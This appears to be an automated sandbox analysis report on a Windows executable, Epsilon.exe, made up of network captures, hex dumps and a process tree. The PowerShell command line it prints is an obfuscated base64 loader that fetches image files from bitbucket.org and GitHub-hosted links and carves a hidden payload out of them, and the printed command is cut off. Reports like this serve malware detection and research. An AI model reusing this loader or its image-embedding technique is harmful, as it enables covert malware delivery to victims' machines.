                                                                              ETag: "b899cc7aa3319a16e239ba6cb263113b100d6fa7ed0190f683f329a66758220c"
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Frame-Options: deny
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-GitHub-Request-Id: 7C3A:31FFFC:3FA070:47A6BC:677330B5
                                                                              Accept-Ranges: bytes
                                                                              Date: Mon, 30 Dec 2024 23:45:57 GMT
                                                                              Via: 1.1 varnish
                                                                              X-Served-By: cache-ewr-kewr1740049-EWR
                                                                              X-Cache: MISS
                                                                              X-Cache-Hits: 0
                                                                              X-Timer: S1735602358.878375,VS0,VE37
                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              X-Fastly-Request-ID: 9783a586f2445cb5c594579c7eef0c5a7f3c0a1a
                                                                              Expires: Mon, 30 Dec 2024 23:50:57 GMT
                                                                              Source-Age: 0
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                              Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 03 66 03 72 03 7e 03 8a 03 96 03 a2 03 ae 03 ba 03 c7 03 d3 03 e0 03 ec 03 f9 04 06 04 13 04 20 04 2d 04 3b 04 48 04 55 04 63 04 71 04 7e 04 8c 04 9a 04 a8 04 b6 04 c4 04 d3 04 e1 04 f0 04 fe 05 0d 05 1c 05 2b 05 3a 05 49 05 58 05 67 05 77 05 86 05 96 05 a6 05 b5 05 c5 05 d5 05 e5 05 f6 06 06 06 16 06 27 06 37 06 48 06 59 06 6a 06 7b 06 8c 06 9d 06 af 06 c0 06 d1 06 e3 06 f5 07 07 07 19 07 2b 07 3d 07 4f 07 61 07 74 07 86 07 99 07 ac 07 bf 07 d2 07 e5 07 f8 08 0b 08 1f 08 32 08 46 08 5a 08 6e 08 82 08 96 08 aa 08 be 08 d2 08 e7 08 fb 09 10 09 25 09 3a 09 4f 09 64 09 79 09 8f 09 a4 09 ba 09 cf 09 e5 09 fb 0a 11 0a 27 0a 3d 0a 54 0a 6a 0a 81 0a 98 0a ae 0a c5 0a dc 0a f3 0b 0b 0b 22 0b 39 0b 51 0b 69 0b 80 0b 98 0b b0 0b c8 0b e1 0b f9 0c 12 0c 2a 0c 43 0c
                                                                              Data Ascii: fr~ -;HUcq~+:IXgw'7HYj{+=Oat2FZn%:Ody'=Tj"9Qi*C
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 97 75 97 e0 98 4c 98 b8 99 24 99 90 99 fc 9a 68 9a d5 9b 42 9b af 9c 1c 9c 89 9c f7 9d 64 9d d2 9e 40 9e ae 9f 1d 9f 8b 9f fa a0 69 a0 d8 a1 47 a1 b6 a2 26 a2 96 a3 06 a3 76 a3 e6 a4 56 a4 c7 a5 38 a5 a9 a6 1a a6 8b a6 fd a7 6e a7 e0 a8 52 a8 c4 a9 37 a9 a9 aa 1c aa 8f ab 02 ab 75 ab e9 ac 5c ac d0 ad 44 ad b8 ae 2d ae a1 af 16 af 8b b0 00 b0 75 b0 ea b1 60 b1 d6 b2 4b b2 c2 b3 38 b3 ae b4 25 b4 9c b5 13 b5 8a b6 01 b6 79 b6 f0 b7 68 b7 e0 b8 59 b8 d1 b9 4a b9 c2 ba 3b ba b5 bb 2e bb a7 bc 21 bc 9b bd 15 bd 8f be 0a be 84 be ff bf 7a bf f5 c0 70 c0 ec c1 67 c1 e3 c2 5f c2 db c3 58 c3 d4 c4 51 c4 ce c5 4b c5 c8 c6 46 c6 c3 c7 41 c7 bf c8 3d c8 bc c9 3a c9 b9 ca 38 ca b7 cb 36 cb b6 cc 35 cc b5 cd 35 cd b5 ce 36 ce b6 cf 37 cf b8 d0 39 d0 ba d1 3c d1 be d2
                                                                              Data Ascii: uL$hBd@iG&vV8nR7u\D-u`K8%yhYJ;.!zpg_XQKFA=:8655679<
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 26 98 26 02 60 98 86 98 00 20 c0 00 00 29 30 00 10 60 00 09 80 00 00 00 00 31 00 28 00 69 80 00 00 00 03 12 30 43 00 00 00 01 30 1a 74 9a 06 00 00 80 30 4d 0c 10 c0 01 31 03 04 03 00 1a 00 01 30 01 30 62 41 a6 02 60 00 00 00 03 0b 00 00 00 1a 06 81 a1 89 8d 06 98 a4 9d 89 a0 18 20 00 00 00 2a 24 80 1d 80 00 31 00 62 06 00 58 00 0c 01 92 44 c1 18 08 00 83 00 18 00 58 0c 14 a2 c6 26 83 4c 72 84 ae 66 f9 8c cb 99 16 d0 29 a6 21 40 62 68 40 69 5a 10 c4 0d 00 d0 0d 00 00 a0 00 84 4a 2c 00 06 80 18 86 c4 8d 30 01 88 18 d1 2b 13 4d 00 04 30 1a 28 68 91 b4 e9 30 13 04 10 28 0c 00 40 01 a0 06 21 30 04 35 01 23 4c 54 c0 13 10 06 0a 40 80 01 96 26 10 03 12 60 01 40 98 0d 43 19 62 24 90 4c 54 48 44 30 1c 41 89 80 80 1a 1a 10 00 a0 80 4d 4a 0d 00 0a d3 95 88 24 8a 49
                                                                              Data Ascii: &&` )0`1(i0C0t0M100bA` *$1bXDX&Lrf)!@bh@iZJ,0+M0(h0(@!05#LT@&`@Cb$LTHD0AMJ$I
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 00 00 00 00 00 00 00 00 28 06 20 00 00 06 20 62 06 00 02 60 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 c1 30 13 43 43 10 30 00 00 00 28 13 80 0b 00 14 01 00 62 00 00 00 00 00 1a 00 06 86 26 98 00 00 00 08 00 03 04 d3 00 00 00 01 06 81 a1 80 00 26 0d 00 30 13 00 0b 1a 18 21 c0 05 00 00 08 34 00 0a 34 20 0c 40 00 00 d0 0c 00 01 30 13 00 00 00 00 10 06 02 60 08 60 02 60 01 40 d2 00 0c 00 00 06 81 a0 1a 62 6d 58 00 09 80 00 00 00 00 c0 69 a0 00 03 a4 0c 10 c0 04 06 84 c0 00 50 00 06 82 68 68 00 00 06 20 06 08 18 00 31 00 89 82 80 00 00 d3 44 30 43 00 68 01 88 00 69 a0 05 02 60 00 03 13 4c 00 46 98 00 86 26 26 3a 06 90 06 26 21 80 8d 00 34 c1 0e 86 9a 26 00 d0 8c 0a 1b 10 4d 43 40 36 8a 6c 11 8d 22 60 0c 2c 4d 82 18 80 30 42 1b 4c 1a 10 69 89 a0 24 81 34
                                                                              Data Ascii: ( b`0CC0(b&&0!44 @0```@bmXiPhh 1D0Chi`LF&&:&!4&MC@6l"`,M0BLi$4
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 00 40 0c 00 10 01 58 cb 3c e0 1f 3f ec 80 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 34 00 c4 c0 4c 04 30 4c 04 c4 34 c0 13 00 04 d0 30 00 10 34 d1 34 d4 43 00 40 c4 31 30 13 01 03 04 8c 05 4c 48 c4 d5 0c 44 c4 34 c1 34 d5 34 d1 00 0d 00 c0 04 c0 04 00 a0 00 00 4c 20 02 80 00 00 00 00 00 00 00 00 00 00 00 00 02 80 00 00 1a 00 00 00 1a 01 80 20 60 09 80 00 00 00 14 00 00 00 00 d0 00 00 00 00 0d 0c 10 0c 13 01 0c 00 00 00 02 80 10 01 40 24 00 b4 01 00 00 00 00 00 00 00 68 60 81 a0 18 00 02 06 00 00 9a 26 0a 00 83 4c 00 00 00 1a 20 60 98 02 60 0c 43 43 01 00 28 00 18 00 00 34 80 00 00 0c 10 d0 c0 00 00 00 00 00 1a 04 01 aa 00 00 46 80 1a 06 05 00 00 00 00 00 00 20 00 34 03 10 0d 03 10 c0 00 06 80 1a 2c 60 03 40 c4 c0 01 0d 0c
                                                                              Data Ascii: @X<?P4L0L4044C@10LHD444L `@$h`&L ``CC(4F 4,`@
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 63 1a 04 20 01 44 12 80 00 98 98 a8 4d cb 11 82 63 10 00 31 00 95 45 8d 22 c6 26 98 34 20 0c 40 c4 34 30 44 a2 48 8b 00 02 93 68 00 81 85 83 1a 31 bb 12 6d 10 31 34 0d 00 02 00 8c b2 71 74 20 86 05 0d 03 40 0d 21 8a 42 69 89 a0 01 00 12 82 74 49 12 34 2a 6a 24 b2 44 55 91 52 b4 0a a5 12 1b 4e 9c 5a 1a 68 60 d1 c4 01 02 80 0d 00 21 ca 98 d1 01 42 93 22 c0 8b 60 0d 20 d3 10 c0 04 31 4a 93 4d 04 31 49 c5 24 9a 00 62 68 3c d8 1e 0f b6 00 00 00 00 00 00 00 00 00 00 34 00 00 d3 00 43 13 10 c1 00 03 04 c0 4d 00 d0 31 03 04 00 20 c1 44 c4 13 04 31 41 31 30 41 00 34 00 00 30 00 54 d3 40 40 d3 01 00 34 03 40 34 00 d0 0d 2b 10 31 08 03 00 40 c2 93 08 13 54 c1 48 c0 a0 00 04 30 00 00 00 00 00 00 00 00 00 a0 08 00 00 28 02 00 28 00 06 80 00 18 00 00 00 00 00 00 00 00
                                                                              Data Ascii: c DMc1E"&4 @40DHh1m14qt @!BitI4*j$DURNZh`!B"` 1JM1I$bh<4CM1 D1A10A40T@@4@4+1@TH0((
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 06 21 a1 80 02 60 00 00 80 31 0d 03 40 34 e8 05 03 0a 1a 62 60 00 20 d3 00 00 00 00 01 89 a1 01 a0 00 18 08 00 04 b2 40 80 03 00 00 13 4c 4c 04 c0 00 01 80 02 00 50 00 34 c0 00 00 01 a0 20 68 00 00 63 a0 12 34 25 01 4a c4 c1 a1 18 14 34 03 4d 00 06 80 18 50 c6 82 92 42 71 9d 83 06 40 10 60 00 20 09 5a 18 d0 ec 10 43 40 a8 18 01 43 04 6d 34 60 d0 4d 53 43 44 04 a0 2a 18 e0 02 c4 31 50 d0 20 18 30 8c a2 38 31 50 0a 01 03 15 0a 40 98 d1 30 01 00 d3 00 2c 00 86 05 00 00 00 9b 22 d8 26 08 30 06 3b 22 d8 24 d0 c1 91 63 1b 43 23 10 0c 10 25 68 04 34 03 62 60 80 00 86 a9 49 00 d0 d0 02 68 9a 12 34 45 64 44 57 14 e5 04 02 44 ad 26 a0 98 80 50 71 1b 44 00 00 00 26 00 0d a5 63 04 49 00 0c 12 6c 43 01 82 03 2c 00 00 60 98 21 82 60 03 48 00 00 c4 30 52 8b 06 8b 00 90
                                                                              Data Ascii: !`1@4b` @LLP4 hc4%J4MPBq@` ZC@Cm4`MSCD*1P 081P@0,"&0;"$cC#%h4b`Ih4EdDWD&PqD&cIlC,`!`H0R
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 00 02 80 00 00 01 00 00 00 00 00 00 00 18 80 06 98 81 88 18 26 08 60 00 80 00 00 00 00 c1 30 43 40 c0 00 13 00 4c 00 01 a1 00 00 00 18 21 82 60 21 b1 00 00 c4 c2 c0 08 00 a0 08 01 d2 18 02 63 40 80 0a 00 8c 4c 00 00 00 00 62 b0 19 08 65 09 80 00 00 80 00 34 00 03 10 d0 c4 30 00 00 62 00 4c 62 00 00 00 28 02 00 74 80 80 1d 21 82 1a 18 08 00 00 c1 34 0c 00 00 00 00 00 00 04 06 94 69 a0 00 34 e9 29 02 00 00 1a 60 86 09 82 00 00 d0 c0 06 9a 26 00 0d 10 0a 0c 44 02 80 00 00 00 03 10 cb 00 00 00 00 13 04 c6 20 06 98 09 80 02 00 c0 45 34 c1 34 e1 0d 00 03 40 09 8a 00 80 25 1a 62 69 80 08 00 a0 34 4c 28 04 36 08 03 10 c1 89 d8 00 12 52 65 89 d8 d8 90 62 06 00 d2 19 24 89 80 98 00 d0 c1 23 02 86 98 c4 d0 62 b2 40 20 08 1a 70 99 2a 43 11 0d 82 45 34 e3 0e 2d 28 02
                                                                              Data Ascii: &`0C@L!`!c@Lbe40bLb(t!4i4)`&D E44@%bi4L(6Reb$#b@ p*CE4-(
                                                                              2024-12-30 23:45:57 UTC1378INData Raw: 49 02 03 04 11 52 4a 40 c7 72 81 00 0a a4 08 93 6a 80 01 a4 60 c4 00 26 1e 54 67 ce fb e0 08 81 89 a6 26 98 26 02 01 a6 08 60 86 86 98 00 81 a6 00 ac 60 00 00 00 00 00 00 00 00 09 80 00 00 00 00 00 00 00 00 00 00 14 01 00 00 00 00 00 00 14 00 00 00 00 34 00 c4 d3 13 40 30 04 d0 d0 c4 c4 0c 00 4c 4d 03 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 01 82 1a 06 80 68 18 14 98 40 05 00 20 00 00 00 00 00 00 c0 13 10 c0 00 00 04 13 15 30 00 11 30 00 00 00 00 01 82 60 02 06 00 d3 44 0c 00 00 00 00 00 00 01 80 05 80 00 00 26 00 00 99 00 14 0d 00 c0 00 00 13 04 68 06 98 02 60 00 00 80 0a d3 2c 43 00 18 80 46 26 26 00 00 86 81 80 81 82 68 60 09 80 d0 50 04 0d 03 05 60 0c 4d 30 00 00 01 a0 00 01 91 18 00 00 00 00 0d 0d 0c 43 04 c0 00 13 00 19 60 86 21
                                                                              Data Ascii: IRJ@rj`&Tg&&``4@0LMh@ 00`D&h`,CF&&h`P`M0C`!


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549705185.166.143.484437660C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-30 23:46:06 UTC104OUTGET /rterterq/fwqfqweqwr/downloads/opkSkch.txt HTTP/1.1
                                                                              Host: bitbucket.org
                                                                              Connection: Keep-Alive
                                                                              2024-12-30 23:46:06 UTC4799INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 30 Dec 2024 23:46:06 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 15006
                                                                              Server: AtlassianEdge
                                                                              Vary: authorization, cookie, user-context, Accept-Language, Origin, Accept-Encoding
                                                                              X-Used-Mesh: False
                                                                              Content-Language: en
                                                                              X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                              Etag: "1c2c848b4429d52ca3adbc7af471337d"
                                                                              X-Dc-Location: Micros-3
                                                                              X-Served-By: b21088039ab2
                                                                              X-Version: c9b3998323c0
                                                                              X-Static-Version: c9b3998323c0
                                                                              X-Request-Count: 4163
                                                                              X-Render-Time: 0.07419872283935547
                                                                              X-B3-Traceid: 9cad47e97f70404b945b4d3a04e1fe2d
                                                                              X-B3-Spanid: ac1738aebb95f397
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Content-Security-Policy: base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassi [TRUNCATED]
                                                                              X-Usage-Quota-Remaining: 998716.986
                                                                              X-Usage-Request-Cost: 1304.27
                                                                              X-Usage-User-Time: 0.039128
                                                                              X-Usage-System-Time: 0.000000
                                                                              X-Usage-Input-Ops: 0
                                                                              X-Usage-Output-Ops: 0
                                                                              Cache-Control: max-age=900
                                                                              Age: 358
                                                                              X-Cache: HIT
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Xss-Protection: 1; mode=block
                                                                              Atl-Traceid: 1de4c2ad7d7f405e98062be16fecf6b4
                                                                              Atl-Request-Id: 1de4c2ad-7d7f-405e-9806-2be16fecf6b4
                                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                              Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                              Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                              Server-Timing: atl-edge;dur=93,atl-edge-internal;dur=4,atl-edge-upstream;dur=91,atl-edge-pop;desc="aws-eu-central-1"
                                                                              Connection: close
                                                                              2024-12-30 23:46:06 UTC11585INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 69 64 3d 22 62 62 2d 62 6f 6f 74 73 74 72 61 70 22 20 64 61 74 61 2d 63 75 72 72 65 6e 74 2d 75 73 65 72 3d 22 7b 26 71 75 6f 74 3b 69 73 41 75 74 68 65 6e 74 69 63 61 74 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 2c 20 26 71 75 6f 74 3b 69 73 4b 62 64 53 68 6f 72 74 63 75 74 73 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 74 72 75 65 2c 20 26 71 75 6f 74 3b 69 73 53 73 68 45 6e 61 62 6c 65 64 26 71 75 6f 74 3b 3a 20 66 61 6c 73 65 7d 22 0a 0a 20 2f 3e 0a 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 4f 79 72 6c 6f 42 77 57 4c 66 4f 6a 7a 68 65 4d 53 33 38 46 51 3d 3d 22 3e 0a 0a 69 66 20 28 77 69 6e 64
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta id="bb-bootstrap" data-current-user="{&quot;isAuthenticated&quot;: false, &quot;isKbdShortcutsEnabled&quot;: true, &quot;isSshEnabled&quot;: false}" /> <script nonce="bOyrloBwWLfOjzheMS38FQ==">if (wind
                                                                              2024-12-30 23:46:06 UTC3421INData Raw: 74 3e 0a 20 20 20 20 0a 20 20 3c 2f 64 69 76 3e 0a 0a 0a 0a 20 20 0a 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 62 4f 79 72 6c 6f 42 77 57 4c 66 4f 6a 7a 68 65 4d 53 33 38 46 51 3d 3d 22 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 5f 69 6e 69 74 69 61 6c 5f 73 74 61 74 65 5f 5f 20 3d 20 7b 22 67 6c 6f 62 61 6c 22 3a 20 7b 22 67 65 6f 69 70 5f 63 6f 75 6e 74 72 79 22 3a 20 6e 75 6c 6c 2c 20 22 69 73 5f 6d 6f 62 69 6c 65 5f 75 73 65 72 5f 61 67 65 6e 74 22 3a 20 66 61 6c 73 65 2c 20 22 73 69 74 65 5f 6d 65 73 73 61 67 65 22 3a 20 22 22 2c 20 22 6e 65 65 64 73 5f 6d 61 72 6b 65 74 69 6e 67 5f 63 6f 6e 73 65 6e 74 22 3a 20 66 61 6c 73 65 2c 20 22 6d 61 72 6b 65 74 69 6e 67 5f 63 6f 6e 73 65 6e 74 5f 6c 6f 63 61 6c 65 22 3a 20 6e 75 6c 6c 2c 20 22 77 68 61 74 73
                                                                              Data Ascii: t> </div> <script nonce="bOyrloBwWLfOjzheMS38FQ=="> window.__initial_state__ = {"global": {"geoip_country": null, "is_mobile_user_agent": false, "site_message": "", "needs_marketing_consent": false, "marketing_consent_locale": null, "whats


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Users\user\Desktop\Epsilon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\Epsilon.exe"
                                                                              Imagebase:0x7ff737820000
                                                                              File size:163'840 bytes
                                                                              MD5 hash:61566AA90D2DCAF483FE4697031F46C4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:cmd.exe /c 677174b841ee7.vbs
                                                                              Imagebase:0x7ff6abe90000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:18:45:52
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs"
                                                                              Imagebase:0x7ff66d2d0000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:18:45:53
                                                                              Start date:30/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB